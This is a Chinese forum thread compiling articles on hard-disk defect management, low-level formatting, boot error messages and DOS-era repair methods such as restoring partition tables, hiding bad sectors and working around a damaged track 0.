    在硬盘内部中所有存在缺陷的部分都被称为Defect。 如果某个磁头状态不好，则这个磁头为Defect head。 如果盘面上某个Track(磁道)不能被正常访问，则这Track为Defect Track. 如果某个扇区不能被正常访问或不能正确记录数据，则该扇区也称为Defect Sector. 可以认为Bad sector 等同于 Defect sector. 从总的来说，某个硬盘只要有一部分存在缺陷，就称这个硬盘为Defect hard disk.

    P-list (永久缺陷表)

    现在的硬盘密度越来越高，单张盘片上存储的数据量超过40Gbytes. 硬盘厂家在生产盘片过程极其精密，但也极难做到100%的完美，硬盘盘面上或多或少存在一些缺陷。厂家在硬盘出厂前把所有的硬盘都进行低级格式化，在低级格式化过程中将自动找出所有defect track和defect sector，记录在P-list中。并且在对所有磁道和扇区的编号过程中，将skip（跳过）这些缺陷部分，让用户永远不能用到它们。这样，用户在分区、格式化、检查刚购买的新硬盘时，很难发现有问题。一般的硬盘都在P-list中记录有一定数量的defect, 少则数百，多则数以万计。如果是SCSI硬盘的话可以找到多种通用软件查看到P-list，因为各种牌子的SCSI硬盘使用兼容的SCSI指令集。而不同牌子不同型号的IDE硬盘，使用各自不同的指令集，想查看其P-list要用针对性的专业软件。
G-list (增长缺陷表)

    用户在使用硬盘过程中，有可能会发现一些新的defect sector。 按“三包”规定，只要出现一个defect sector，商家就应该为用户换或修。现在大容量的硬盘出现一个defect sector概率实在很大，这样的话硬盘商家就要为售后服务忙碌不已了。于是，硬盘厂商设计了一个自动修复机制，叫做Automatic Reallcation。有大多数型号的硬盘都有这样的功能：在对硬盘的读写过程中，如果发现一个defect sector，则自动分配一个备用扇区替换该扇区，并将该扇区及其替换情况记录在G-list中。这样一来，少量的defect sector对用户的使用没有太大的影响。

也有一些硬盘自动修复机制的激发条件要严格一些，需要用某些软件来判断defect sector,并通过某个端口（据说是50h）调用自动修复机制。比如常用的Lformat, ADM，DM中的Zero fill，Norton中的Wipeinfo和校正工具，西数工具包中的wddiag, IBM的DFT中的Erase等。这些工具之所以能在运行过后消除了一些“坏道”，很重要的原因就在这Automatic Reallcation（当然还有其它原因），而不能简单地概括这些“坏道”是什么“逻辑坏道”或“假坏道”。 如果哪位被误导中毒太深的读者不相信这个事实，等他找到能查看G-list的专业工具后就知道，这些工具运行过后，G-list将会增加多少记录！“逻辑坏道”或“假坏道”有必要记录在G-list中并用其它扇区替换么？

    当然，G-list的记录不会无限制，所有的硬盘都会限定在一定数量范围内。如火球系列限度是500，美钻二代的限度是636，西数BB的限度是508，等等。超过限度，Automatic Reallcation就不能再起作用。这就是为何少量的“坏道”可以通过上述工具修复（有人就概括为：“逻辑坏道”可以修复），而坏道多了不能通过这些工具修复（又有人概括为：“物理坏道”不可以修复）。

    Bad track (坏道）

    这个概念源于十多年前小容量硬盘（100M以下），当时的硬盘在外壳上都贴有一张小表格，上面列出该硬盘中有缺陷的磁道位置（新硬盘也有）。在对这个硬盘进行低级格式化时（如用ADM或DM 5.0等工具,或主板中的低格工具），需要填入这些Bad track的位置, 以便在低格过程中跳过这些磁道。现在的大容量硬盘在结构上与那些小容量硬盘相差极大，这个概念用在大容量硬盘上有点牵强。

    读者们还可能发现国内很多刊物和网上文章中还有这么几个概念：物理坏道，逻辑坏道，真坏道，假坏道，硬坏道，软坏道等。高朋在国外的硬盘技术资料中没有找到对应的英文概念，也许是中国人自己概括的吧？既然有那么多的人能接受这些概念，也许某些专家能作出一些的合理解释。 高朋不习惯使用这些概念，不想对它们作牵强的解释，读者们看看是谁说的就去问谁吧。
深入了解硬盘参数

    正常情况下，硬盘在接通电源之后，都要进行“初始化”过程（也可以称为“自检”）。这时，会发出一阵子自检声音，这些声音长短和规律视不同牌子硬盘而各不一样，但同型号的正常硬盘的自检声音是一样的。 有经验的人都知道，这些自检声音是由于硬盘内部的磁头寻道及归位动作而发出的。为什么硬盘刚通电就需要执行这么多动作呢？简单地说，是硬盘在读取的记录在盘片中的初始化参数。

    一般熟悉硬盘的人都知道，硬盘有一系列基本参数，包括：牌子、型号、容量、柱面数、磁头数、每磁道扇区数、系列号、缓存大小、转速、S.M.A.R.T值等。其中一部分参数就写在硬盘的标签上，有些则要通过软件才能测出来。但是，高朋告诉你，这些参数仅仅是初始化参数的一小部分，盘片中记录的初始化参数有数十甚至数百个！硬盘的CPU在通电后自动寻找BIOS中的启动程序，然后根据启动程序的要求，依次在盘片中指定的位置读取相应的参数。如果某一项重要参数找不到或出错，启动程序无法完成启动过程，硬盘就进入保护模式。在保护模式下，用户可能看不到硬盘的型号与容量等参数，或者无法进入任何读写操作。近来有些系列的硬盘就是这个原因而出现类似的通病，如：FUJITSU MPG系列自检声正常却不认盘，MAXTOR美钻系列认不出正确型号及自检后停转，WD BB EB系列能正常认盘却拒绝读写操作等。

    不同牌子不同型号的硬盘有不同的初始化参数集，以较熟悉的Fujitsu硬盘为例，高朋简要地讲解其中一部分参数，以便读者理解内部初始化参数的原理

--------------------------------------------------------------------------------

2006-6-24 10:58:37　编辑 删除　IP：已记录

Re:[推荐]★硬盘修复真经★
wand

角色：超级版主
等级：阿诺
发帖：624
经验：2862
金币：128
注册：2006年6月5日

信息 日志 短讯 邮箱 好友 搜索 引用 回复 No.2

--------------------------------------------------------------------------------

通过专用的程序控制硬盘的CPU，根据BIOS程序的需要，依次读出初始化参数集，按模块分别存放为69个不同的文件，文件名也与BIOS程序中调用到的参数名称一致。其中部分参数模块的简要说明如下：

    DM硬盘内部的基本管理程序

    - PL永久缺陷表
    - TS缺陷磁道表
    - HS实际物理磁头数及排列顺序
    - SM最高级加密状态及密码
    - SU用户级加密状态及密码
    - CI 硬件信息，包括所用的CPU型号，BIOS版本，磁头种类，磁盘碟片种类等
    - FI生产厂家信息
    - WE写错误记录表
    - RE读错误记录表
    - SI容量设定，指定允许用户使用的最大容量（MAX LBA），转换为外部逻辑磁头数(一般为16)和逻辑每磁道扇区数（一般为63）
    - ZP区域分配信息，将每面盘片划分为十五个区域，各个区域上分配的不同的扇区数量，从而计算出最大的物理容量。

这些参数一般存放在普通用户访问不到的位置,有些是在物理零磁道以前,可以认为是在负磁道的位置。可能每个参数占用一个模块，也可能几个参数占用同一模块。模块大小不一样，有些模块才一个字节，有些则达到64K字节。这些参数并不是连续存放的，而是各有各的固定位置。

    读出内部初始化参数表后，就可以分析出每个模块是否处于正常状态。当然，也可以修正这些参数，重新写回盘片中指定的位置。这样，就可以把一些因为参数错乱而无法正常使用的硬盘“修复”回正常状态。

    如果读者有兴趣进一步研究，不妨将硬盘电路板上的ROM芯片取下，用写码机读出其中的BIOS程序，可以在程序段中找到以上所列出的参数名称。

    硬盘修复之低级格式化

    熟悉硬盘的人都知道，在必要的时候需要对硬盘做“低级格式化”（下面简称“低格”）。进行低格所使用的工具也有多种：有用厂家专用设备做的低格，有用厂家提供的软件工具做的低格，有用DM工具做的低格，有用主板BIOS中的工具做的低格，有用Debug工具做的低格，还有用专业软件做低格……

    不同的工具所做的低格对硬盘的作用各不一样。有些人觉得低格可以修复一部分硬盘，有些人则觉得低格十分危险，会严重损害硬盘。高朋用过多种低格工具，认为低格是修复硬盘的一个有效手段。下面总结一些关于低格的看法，与广大网友交流。

    大家关心的一个问题：“低格过程到底对硬盘进行了什么操作？”实践表明低格过程有可能进行下列几项工作，不同的硬盘的低格过程相差很大，不同的软件的低格过程也相差很大

A. 对扇区清零和重写校验值

    低格过程中将每个扇区的所有字节全部置零，并将每个扇区的校验值也写回初始值，这样可以将部分缺陷纠正过来。譬如，由于扇区数据与该扇区的校验值不对应，通常就被报告为校验错误（ECC Error）。如果并非由于磁介质损伤，清零后就很有可能将扇区数据与该扇区的校验值重新对应起来，而达到“修复”该扇区的功效。这是每种低格工具和每种硬盘的低格过程最基本的操作内容，同时这也是为什么通过低格能“修复大量坏道”的基本原因。另外，DM中的Zero Fill（清零）操作与IBM DFT工具中的Erase操作，也有同样的功效。

    B. 对扇区的标识信息重写

    在多年以前使用的老式硬盘（如采用ST506接口的硬盘），需要在低格过程中重写每个扇区的标识（ID）信息和某些保留磁道的其他一些信息，当时低格工具都必须有这样的功能。但现在的硬盘结构已经大不一样，如果再使用多年前的工具来做低格会导致许多令人痛苦的意外。难怪经常有人在痛苦地高呼：“危险！切勿低格硬盘！我的硬盘已经毁于低格！”

    C. 对扇区进行读写检查，并尝试替换缺陷扇区

    有些低格工具会对每个扇区进行读写检查，如果发现在读过程或写过程出错，就认为该扇区为缺陷扇区。然后，调用通用的自动替换扇区（Automatic reallocation sector）指令，尝试对该扇区进行替换，也可以达到“修复”的功效。

    D. 对所有物理扇区进行重新编号

    编号的依据是P-list中的记录及区段分配参数（该参数决定各个磁道划分的扇区数），经过编号后，每个扇区都分配到一个特定的标识信息（ID）。编号时，会自动跳过P-list中所记录的缺陷扇区，使用户无法访问到那些缺陷扇区（用户不必在乎永远用不到的地方的好坏）。如果这个过程半途而废，有可能导致部分甚至所有扇区被报告为标识不对（Sector ID not found, IDNF）。要特别注意的是，这个编号过程是根据真正的物理参数来进行的，如果某些低格工具按逻辑参数（以 16heads 63sector为最典型）来进行低格，是不可能进行这样的操作。

    E. 写磁道伺服信息，对所有磁道进行重新编号

    有些硬盘允许将每个磁道的伺服信息重写，并给磁道重新赋予一个编号。编号依据P-list或TS记录来跳过缺陷磁道（defect track）,使用户无法访问（即永远不必使用）这些缺陷磁道。这个操作也是根据真正的物理参数来进行。

    F. 写状态参数，并修改特定参数

    有些硬盘会有一个状态参数，记录着低格过程是否正常结束，如果不是正常结束低格，会导致整个硬盘拒绝读写操作，这个参数以富士通IDE硬盘和希捷SCSI硬盘为典型。有些硬盘还可能根据低格过程的记录改写某些参数。

下面我们来看看一些低格工具做了些什么操作：

    1. DM中的Low level format

    进行了A和B操作。速度较快，极少损坏硬盘，但修复效果不明显。

    2. Lformat

    进行了A、B、C操作。由于同时进行了读写检查，操作速度较慢，可以替换部分缺陷扇区。但其使用的是逻辑参数，所以不可能进行D、E和F的操作。遇到IDNF错误或伺服错误时很难通过，半途会中断。

    3. SCSI卡中的低格工具

    由于大部SCSI硬盘指令集通用，该工具可以对部分SCSI硬盘进行A、B、C、D、F操作，对一部分SCSI硬盘（如希捷）修复作用明显。遇到缺陷磁道无法通过。同时也由于自动替换功能，检查到的缺陷数量超过G-list限度时将半途结束，硬盘进入拒绝读写状态。

    4. 专业的低格工具

    一般进行A、B、D、E、F操作。通常配合伺服测试功能（找出缺陷磁道记入TS），介质测试功能（找出缺陷扇区记入P-list），使用的是厂家设定的低格程序（通常存放在BIOS或某一个特定参数模块中），自动调用相关参数进行低格。一般不对缺陷扇区进行替换操作。低格完成后会将许多性能参数设定为刚出厂的状态。
在这里, 顺便回答一些读者常重复问到的问题：

    问1：低格能不能修复硬盘？
    答1：合适的低格工具能在很大程度上修复硬盘缺陷。

    问2：低格会不会损伤硬盘？
    答2：正确的低格过程绝不会在物理上损伤硬盘。用不正确的低格工具则可能严重破坏硬盘的信息，而导致硬盘不能正常使用。

    问3：什么时候需要对硬盘进行低格？
    答3：在修改硬盘的某些参数后必须进行低格，如添加P-list记录或TS记录，调整区段参数，调整磁头排列等。另外, 每个用户都可以用适当低格工具修复硬盘缺陷，注意：必须是适当的低格工具。

    问4：什么样的低格工具才可以称为专业低格工具？
    答4：能调用特定型号的记录在硬盘内部的厂家低格程序，并能调用到正确参数集对硬盘进行低格，这样的低格工具均可称为专业低格工具。


硬盘引导型故障分析及排除

《一键清理系统垃圾》

硬盘引导型故障分析及排除

     硬盘引导型故障一般在启动机器时出现，这种故障有可能是系统本身的原因造成的，也可能是由病毒引起的。由病毒引起的故障通过查杀毒就能解决，因此下面就分析病毒以外的故障，供大家参考：

1、HDD controller failure(硬盘驱动器控制失败)

这是启动机器时，由POST程序向驱动器发出寻道命令后，驱动器在规定时间内没有完成操作而产生的超时错误。出现这种错误，有可能你的硬盘已经损坏了。

2、C:drive failure(硬盘C驱动失败)

RUN SETUP UTTLITY(运行设置功能)

Press to Resume(按键重新开始)

这种故障一般是因为硬盘的类型设置参数与格式化时所用的参数不符。由于IDE硬盘的设置参数是逻辑参数，所以这种情况多数由软盘启动后，C盘也能够正常读写，只是不能启动。

3、Invalid Drive Specification(无效的驱动器号)

如果一个分区或逻辑驱动器在分区表里的相应表项已不存在，那么对于操作系统来说，该分区或逻辑驱动器也就不存在了，因此这种故障问题一般出在分区表。修复这类故障，最简单的方法是事先做好分区表的备份，比如Pctools9.0、Kv3000等都有这项功能。

4、Error Loading Operation System(调进操作系统错误)

这类故障是在读取分区引导区（BOOT区）出错时提示的。其原因可能一是分区表指示的分区起始物理地址不正确。比如由于误操作而把分区表项的起始扇区号（在第三字节）由1改为0，因而INT 13H读盘失败后，即报此错；二是分区引导扇区所在磁道的磁道标志和扇区ID损坏，找不到指定扇区；三是驱动器读电路故障。

5、硬盘不能引导系统，如有软驱，则由A驱引导，显示：

DRIVE NOT READY ERROR(设备未准备好)

Insert Boot Diskette in A：(插入引导盘到A驱)

Press any key when ready(准备好后按任意键)

这是由于由硬盘引导系统，就要通过BIOS中INT 19H固定读取硬盘0面0道1扇区，寻找主引导程序和分区表。INT 19H读取主引导扇区的失败原因有：第一，硬盘读电路故障，使读操作失败，属硬件故障；第二，0面0道磁道格式和扇区ID逻辑或物理损坏，找不到指定的扇区；第三，读盘没有出错，但读出的MBR尾标不为"55AA"，系统认为MBR不正确，这是软故障。

6、Non－System Disk or Disk Error

Replace And Press any key when ready(非系统盘或磁盘错误，重新换盘后按任意键)

DOS BOOT区中的引导程序执行后发现错误，报此信息。其可能的原因有：硬盘根目录区第一扇区地址出界(在540M之后)、读盘出错。这类故障大多为软件故障，如果BPB表损坏，即用软盘启动后，硬盘不能正常读写，可以用NDD修复；如果BPB表完好，只需简单的SYS C：传送系统就可引导。

7、NO ROM BASIC(没有固化BASIC)

SYSTEM HALT(系统停机)

这种错误在486及以前的机器上常常出现，是相当古老的机器才会出现的提示。主引导程序的作用，就是在分区表的四个表项中找出一个激活分区(可自举分区)。如果四个表项中没有一个是激活分区，系统就不知从何处引导操作系统，只能执行INT 188H，调用固化BASIC程序，如果没有固化BASIC，就会引起死机。所以最简单的修复方法，就是用FDISK在硬盘上设置一个活动分区。

8、显示出"Starting Windows…"，然后死机

一般来说，这是由于CONFIG.SYS和AUTOEXC.BAT中的可执行文件本身已经损坏，使得系统在执行到此文件时死机。这个故障非常简单，但因为没有什么故障信息，一般人很容易出现误判。当出现这种现象，并且确信系统文件是完好的，就可以取掉这两个文件，或者在屏幕上出现以上信息时，快速按下F8键，然后选择单步执行，找出已经损坏的文件。

9、Invalid Partition table(无效的分区表)

在找到激活分区后，主引导程序还将判断余下的三个表项的"分区引导标志"字节（首字节）是否均为0，即确认是否只有唯一的激活分区，如果有一个不为0，系统就报错并死机。

10、Invalid Media Type Reading Drive X（X驱动器介质类型无效）

Abort, Retry,Fail?

这条信息是针对DOS BOOT区中无效的BPB表而提示的。BPB表是DOS读写硬盘所用的逻辑地址换算成物理地址的桥梁，BPB表损坏，会使DOS对磁盘的操作无从谈起。

11、HDC controller fail（硬盘控制器控制失败）

这类故障是硬件故障，POST程序向控制器发出复位命令后，在规定的时间内没有得到控制器的中断响应，可能是控制器损坏或电缆没接好，另外，控制器控制失败与硬盘参数设置是否正确也有关。


用活动硬盘盒巧修硬盘

《一键清理系统垃圾》

用活动硬盘盒巧修硬盘

    我有两块硬盘，一块希捷，一块三星，均为4.3GB，其中希捷为主盘， 三星为从盘。主盘被分为C、D两个分区，C盘装有Windows 98，D盘装常用程序，E盘则装游戏，从盘分为F、G两个逻辑区，均为数据和资料。前些天我想在电脑里同时安装Windows 98和 Windows Me，因为Windows 98只能引导 DOS，Windows Me也没有多重引导功能，故想试用一些第三方的多重引导程序，谁知噩梦从此开始——

    故障现象：在Windows 98下安装了BootManager后，也许是操作有误，重启后系统检测完硬盘、光驱即止步不前，不能启动了。

    故障诊断：用Windows 98启动软盘引导系统，现象同前，未显示硬件信息列表。我首先进入 CMOS，检测IDE设备，两硬盘均可找到；关闭IDE接口，重启，用软盘可正常启动，由此初步判断可能硬盘引导区有错，导致系统不能正常读取硬盘。于是进入CMOS，设主盘为自动，从盘关闭，启动后可以进入 Windows 98，但找不到从盘；再把主盘关闭，设从盘为自动，则不能启动。原来是从盘引导区有问题！我立时惊出一身冷汗，那上面有我积累了近两年的数据呀，怎么办?

    把从盘关闭，进入Windows 98，使用诺顿磁盘医生NDD找不到故障盘，无法修复；别的一些工具软件则不是同样找不到就是找到后只能低级格式化，都不能解决问题。怎么才能让NDD找到出错的盘呢?我猛然想起单位最近为了备份资料购买的活动硬盘盒，也许会有点用？

    解决：迅速把单位的并口活动硬盘盒借来，装入故障盘后接到电脑并口，开机进入Windows 98，安装了活动硬盘驱动程序，结束时，盒上的指示灯闪了几闪，有戏!马上查看设备管理器，三星硬盘赫然已在其中。赶紧启动NDD，程序立刻发现了故障盘上的错误，并很快就将其修复，我的F盘和G盘终于回来了!

    事后总结：

    ● 使用有关硬盘引导区等“敏感地带”的软件，必须慎之又慎，要用也要先妥善安排好数据备份，否则一旦出错，后果难料。

    ● 遇到问题要沉着冷静，分析问题的症结所在，充分利用各种可用的方法和工具。


用软件修理硬盘故障

《一键清理系统垃圾》

用软件修理硬盘故障

   作为存储设备中的一员，硬盘起着极其重要的作用。但是由于硬盘属于磁介质，因此其寿命与稳定不像内存等设备那样好，使用时难免会出现各种各样的问题。而且令情况更加复杂的是，由于硬盘牵涉到系统底层的设置，因此往往不能在大家熟悉的Windows下解决问题，必须转到DOS下处理，这对于不少DIY新手而言就有些无所适从了，毕竟他们没有经历过DOS时代。
   硬盘出现问题前的一般征兆　 如果硬盘出现故障，那么最好尽早发现并及时采取正确的措施。如果等到病入膏肓时，硬盘中宝贵的数据就难以幸免了。一般来说，硬盘出现故障前会有以下几种表现：
   1.出现S.M.A.R.T故障提示。这是硬盘厂家本身内置在硬盘里的自动检测功能在起作用，出现这种提示说明您的硬盘有潜在的物理故障，很快就会出现不定期地不能正常运行的情况。
   2.在Windows初始化时死机。这种情况较复杂，首先应该排除其他部件出问题的可能性，比如内存质量不好、风扇停转导致系统过热，或者是病毒破坏等，最后如果确定是硬盘故障的话，再另行处理。
   3.能进入Windows系统，但是运行程序出错，同时运行磁盘扫描也不能通过，经常在扫描时候缓慢停滞甚至死机。这种现象可能是硬盘的问题，也可能是Windows天长日久的软故障，如果排除了软件方面设置问题的可能性后，就可以肯定是硬盘有物理故障了。
   4.能进入Windows，运行磁盘扫描程序直接发现错误甚至是坏道，这不用我多说了，Windows的检查程序会详细地报告情况。
   5.在BIOS里突然根本无法识别硬盘，或是即使能识别，也无法用操作系统找到硬盘，这是最严重的故障。
   不幸中的大幸 ——分区表遭到破坏
   首先我们应该确认硬盘的电源接口和数据线没有脱落，然后进入BIOS，使用“HDD Auto Detect”来检测硬盘。如果此时BIOS能够正确识别硬盘的话，那么至少你的硬盘还有救治的希望；不然，我想大家也不用瞎忙了，因为凭我们普通DIYer手头的工具基本上是无能为力的。 在UltraEdit中查找“55aa”字符串
   用光盘或者软盘引导系统后，大家可以试图进入C盘符，如果此时提示找不到C盘的话，那么绝对应该是一件好事情。出现这种情况很可能是硬盘分区表信息遭到破坏，或者被某种病毒攻击。如果硬盘中你的数据对来说无所谓，那么可以先用FDISK/MBR命令来无条件清除分区表内容，然后用FDISK等分区软件重新分区格式化，一般这样就能解决问题；而如果你还需要硬盘中的数据，那么步骤要麻烦一些。这时最好能拥有一张杀病毒软件或者随主板赠送的相关软件，然后你可以参阅帮助文档，一般该软件会包含恢复硬盘分区表的命令，而且使用极其方便。
   对于没有杀毒盘的用户来说，大家可以使用NU 8.0中的NDD修复，它将检查分区表中的错误。若发现错误，NDD将会询问是否愿意修改，你只要不断地回答YES即可修正错误，或者用备份过的分区表覆盖它也行。 用Hide Partition就可以实现 　　如果用上述方法也不能解决的话，还可利用FDISK重新分区，但分区大小必须和原来的分区一样，这一点尤为重要，分区后不要进行高级格式化，而是用 NDD进行修复。这样既保证硬盘修复之后能启动，而且硬盘上的数据也不会丢失。
   边缘求生存 ——硬盘的物理坏道
   如果刚才DOS能够转到C盘，而硬盘工作却不正常，那么就很可能是硬盘出现了坏道。一般来说，硬盘的坏道可以分为逻辑坏道与物理坏道。产生逻辑坏道时一般不会严重影响使用，所以很可能是物理坏道。
   我们处理物理坏道的核心思想是将这些有坏道的簇单独分成一个分区，并隐藏起来避免其它程序调用，这样就可以不让坏道扩散，以免造成更大的损失。对于这一处理，我们主要是使用Partition Magic6.0这款DOS下的软件。
   在DOS界面下进入PQ 6.0之后，我们先用Operations菜单下的Check For Errors命令来确定物理坏道的位置，因为PQ6.0的这项功能非常出色，不像Windows下的Scandisk那样经常误诊。 　　PQ6.0的真正强大之处在于它能将所有藏有坏道的簇用特殊标记标定出来，而且你可以将这些坏簇全部选中，然后将它们划分到一个独立的新分区。这完全是图形化的操作，是非常方便的。随后，大家切记要把这个充满罪恶的分区隐藏起来，这样才能确保它不会被调用。此时使用Advance菜单下的Hide Partition命令就可以实现。
   拥有PQ6.0之后，物理坏道真的不难解决，而且可以有效避免扩散问题。但是需要注意的是，无论如何，此时的硬盘已经处于亚健康状态，其中的数据还是非常危险的。用PQ6.0处理物理坏道后，究竟这块硬盘还能用多少时间很难说，这要看运气了。
   DOS启动的低级失误——逻辑锁
   硬盘逻辑锁是一种很常见的恶作剧手段。中了逻辑锁之后，无论使用什么设备都不能正常引导系统，甚至是软盘、光驱、挂双硬盘都一样没有任何作用。
   要解决逻辑锁的问题，就要知道问题的根源。其实在DOS系统启动时，它会搜索所有逻辑盘的顺序。首先要找的是主引导扇区的分区表信息，它位于硬盘的零磁头零柱面的第一个扇区的OBEH地址开始的地方，当分区信息开始的地方为80H时表示是主引导分区，其他的为扩展分区，主引导分区被定义为逻辑盘C盘，然后查找扩展分区的逻辑盘，被定义为D盘，以此类推找到E，F，G……逻辑锁就是在此下手，修改了正常的主引导分区记录,将扩展分区的第一个逻辑盘指向自己，DOS在启动时查找到第一个逻辑盘后，查找下个逻辑盘总是找到是自己，这样一来就形成了死循环。
   对于这类问题，如果你不想要硬盘上的数据了，那么处理起来也是非常爽快的。大家可以在BIOS中将所有IDE接口设为NONE，然后用软盘启动系统，此时肯定可以启动，因为系统根本就没有硬盘。接着，我们就使用经典的硬盘管理软件DM了。由于DM可以不依赖于主板BIOS来识别硬盘，因此你可以用DM进行分区格式化，这样就能完全解决问题，而且万无一失，简单方便，惟一的遗憾就是数据保不住了。
   此外还有一种方法也是非常值得推荐的，它可以保住硬盘中的数据。首先准备一张启动盘，然后在一台正常的机器上，使用你熟悉的二进制编辑工具(UltraEdit等)修改软盘上的IO.SYS文件(修改前记住改该文件的属性为正常)，具体是在这个文件里面搜索第一个“55aa”字符串，找到以后修改为任何其他数值即可。用这张修改过的系统软盘你就可以顺利地带着被锁的硬盘启动了。不过这时由于该硬盘正常的分区表已经被破坏，你无法用FDISK来删除和修改分区，但是此时可以用上面关于分区表恢复的方法来处理。
   死马当活马医——修复0磁道损坏的硬盘
   如果在对硬盘进行格式化时，系统提示“Track 0 Bad”的话，那么意味着硬盘的0磁道损坏了。一般来说这种故障是难以修好的，但是我们还是不必放弃，说不定还有一线生机。
   其实0磁道损害也是坏道的问题，只不过关键的0磁道也有坏道而已。此时，我们所要做的就是重新标记0磁道的位置。这项工作我们可以交给PCTools 9.0工具包，我们要利用的是其中的DE.EXE命令。
   为了修改0磁道文字，首先要去掉DE的只读属性，我们必须把Configuration下Read Only前的钩消去。随后在主菜单Select中进入Drive type，并选择下一级的Physical→Hard disk。回车之后，我们的主菜单就会出现Partition Table(分区表)，注意找Beginning Cylinder(起始柱面)这一项，它代表硬盘的0柱面开始，也就是0磁道的位置。此时大家只要稍微动一下，把它改为1或者2即可。
   需要说明的是，这里的数值不能随意改动，一旦改动幅度太大，BIOS就不能正确识别硬盘。但是问题是万一改动后的位置仍然是有坏道的怎么办？呵呵，我目前也想不出办法，希望有机会大家可以探讨一下。如果运气不算太坏的话，那么我们接着就可以采用隐藏坏道的方法来进行分区格式化处理了。


用软件修理硬盘故障的“四个绝招”

《一键清理系统垃圾》

用软件修理硬盘故障的“四个绝招”

   硬盘出现问题前的一般征兆

    如果硬盘出现故障，那么最好尽早发现并及时采取正确的措施。如果等到病入膏肓时，硬盘中宝贵的数据就难以幸免了。一般来说，硬盘出现故障前会有以下几种表现：

1、出现S.M.A.R.T故障提示。这是硬盘厂家本身内置在硬盘里的自动检测功能在起作用，出现这种提示说明您的硬盘有潜在的物理故障，很快就会出现不定期地不能正常运行的情况。

2、在Windows初始化时死机。这种情况较复杂，首先应该排除其他部件出问题的可能性，比如内存质量不好、风扇停转导致系统过热，或者是病毒破坏等，最后如果确定是硬盘故障的话，再另行处理。

3、能进入Windows系统，但是运行程序出错，同时运行磁盘扫描也不能通过，经常在扫描时候缓慢停滞甚至死机。这种现象可能是硬盘的问题，也可能是Windows天长日久的软故障，如果排除了软件方面设置问题的可能性后，就可以肯定是硬盘有物理故障了。

4、能进入Windows，运行磁盘扫描程序直接发现错误甚至是坏道，这不用我多说了，Windows的检查程序会详细地报告情况。

5、在BIOS里突然根本无法识别硬盘，或是即使能识别，也无法用操作系统找到硬盘，这是最严重的故障。

‖分区表遭到破坏‖

    首先我们应该确认硬盘的电源接口和数据线没有脱落，然后进入BIOS，使用“HDD Auto Detect”来检测硬盘。如果此时BIOS能够正确识别硬盘的话，那么至少你的硬盘还有救治的希望；不然，我想大家也不用瞎忙了，因为凭我们普通DIYer手头的工具基本上是无能为力的。

    用光盘或者软盘引导系统后，大家可以试图进入C盘符，如果此时提示找不到C盘的话，那么绝对应该是一件好事情。出现这种情况很可能是硬盘分区表信息遭到破坏，或者被某种病毒攻击。如果硬盘中你的数据对来说无所谓，那么可以先用FDISK/MBR命令来无条件清除分区表内容，然后用Fddisk等分区软件重新分区格式化，一般这样就能解决问题；而如果你还需要硬盘中的数据，那么步骤要麻烦一些。这时最好能拥有一张杀病毒软件或者随主板赠送的相关软件，然后你可以参阅帮助文档，一般该软件会包含恢复硬盘分区表的命令，而且使用极其方便。

    对于没有杀毒盘的用户来说，大家可以使用NU 8.0中的NDD修复，它将检查分区表中的错误。若发现错误，NDD将会询问是否愿意修改，你只要不断地回答Yes即可修正错误，或者用备份过的分区表覆盖它也行。

    如果用上述方法也不能解决的话，还可利用Fdisk重新分区，但分区大小必须和原来的分区一样，这一点尤为重要，分区后不要进行高级格式化，而是用NDD进行修复。这样既保证硬盘修复之后能启动，而且硬盘上的数据也不会丢失。

‖硬盘的物理坏道‖

    如果刚才DOS能够转到C盘，而硬盘工作却不正常，那么就很可能是硬盘出现了坏道。一般来说，硬盘的坏道可以分为逻辑坏道与物理坏道。产生逻辑坏道时一般不会严重影响使用，所以很可能是物理坏道。

    我们处理物理坏道的核心思想是将这些有坏道的簇单独分成一个分区，并隐藏起来避免其它程序调用，这样就可以不让坏道扩散，以免造成更大的损失。对于这一处理，我们主要是使用Partition Magic6.0这款DOS下的软件。在DOS界面下进入PQ 6.0之后，我们先用Operations菜单下的Check For Errors命令来确定物理坏道的位置，因为PQ6.0的这项功能非常出色，不像Windows下的Scandisk那样经常误诊。 PQ6.0的真正强大之处在于它能将所有藏有坏道的簇用特殊标记标定出来，而且你可以将这些坏簇全部选中，然后将它们划分到一个独立的新分区。这完全是图形化的操作，是非常方便的。随后，大家切记要把这个充满罪恶的分区隐藏起来，这样才能确保它不会被调用。此时使用Advance菜单下的Hide Partition命令就可以实现。 拥有PQ6.0之后，物理坏道真的不难解决，而且可以有效避免扩散问题。但是需要注意的是，无论如何，此时的硬盘已经处于亚健康状态，其中的数据还是非常危险的。用PQ6.0处理物理坏道后，究竟这块硬盘还能用多少时间很难说，这要看运气了。

‖逻辑锁‖

    硬盘逻辑锁是一种很常见的恶作剧手段。中了逻辑锁之后，无论使用什么设备都不能正常引导系统，甚至是软盘、光驱、挂双硬盘都一样没有任何作用。

    要解决逻辑锁的问题，就要知道问题的根源。其实在DOS系统启动时，它会搜索所有逻辑盘的顺序。首先要找的是主引导扇区的分区表信息，它位于硬盘的零磁头零柱面的第一个扇区的OBEH地址开始的地方，当分区信息开始的地方为80H时表示是主引导分区，其他的为扩展分区，主引导分区被定义为逻辑盘C盘，然后查找扩展分区的逻辑盘，被定义为D盘，以此类推找到E，F，G……逻辑锁就是在此下手，修改了正常的主引导分区记录,将扩展分区的第一个逻辑盘指向自己，DOS在启动时查找到第一个逻辑盘后，查找下个逻辑盘总是找到是自己，这样一来就形成了死循环。

    对于这类问题，如果你不想要硬盘上的数据了，那么处理起来也是非常爽快的。大家可以在BIOS中将所有IDE接口设为NONE，然后用软盘启动系统，此时肯定可以启动，因为系统根本就没有硬盘。接着，我们就使用经典的硬盘管理软件DM了。由于DM可以不依赖于主板BIOS来识别硬盘，因此你可以用DM进行分区格式化，这样就能完全解决问题，而且万无一失，简单方便，唯一的遗憾就是数据保不住了。

    此外还有一种方法也是非常值得推荐的，它可以保住硬盘中的数据。首先准备一张启动盘，然后在一台正常的机器上，使用你熟悉的二进制编辑工具（UltraEdit等 ）修改软盘上的IO.SYS文件（修改前记住改该文件的属性为正常），具体是在这个文件里面搜索第一个“55aa”字符串，找到以后修改为任何其他数值即可。用这张修改过的系统软盘你就可以顺利地带着被锁的硬盘启动了。不过这时由于该硬盘正常的分区表已经被破坏，你无法用FDISK来删除和修改分区，但是此时可以用上面关于分区表恢复的方法来处理。

‖修复0磁道损坏的硬盘‖

    如果在对硬盘进行格式化时，系统提示“Track 0 Bad”的话，那么意味着硬盘的0磁道损坏了。一般来说这种故障是难以修好的，但是我们还是不必放弃，说不定还有一线生机。

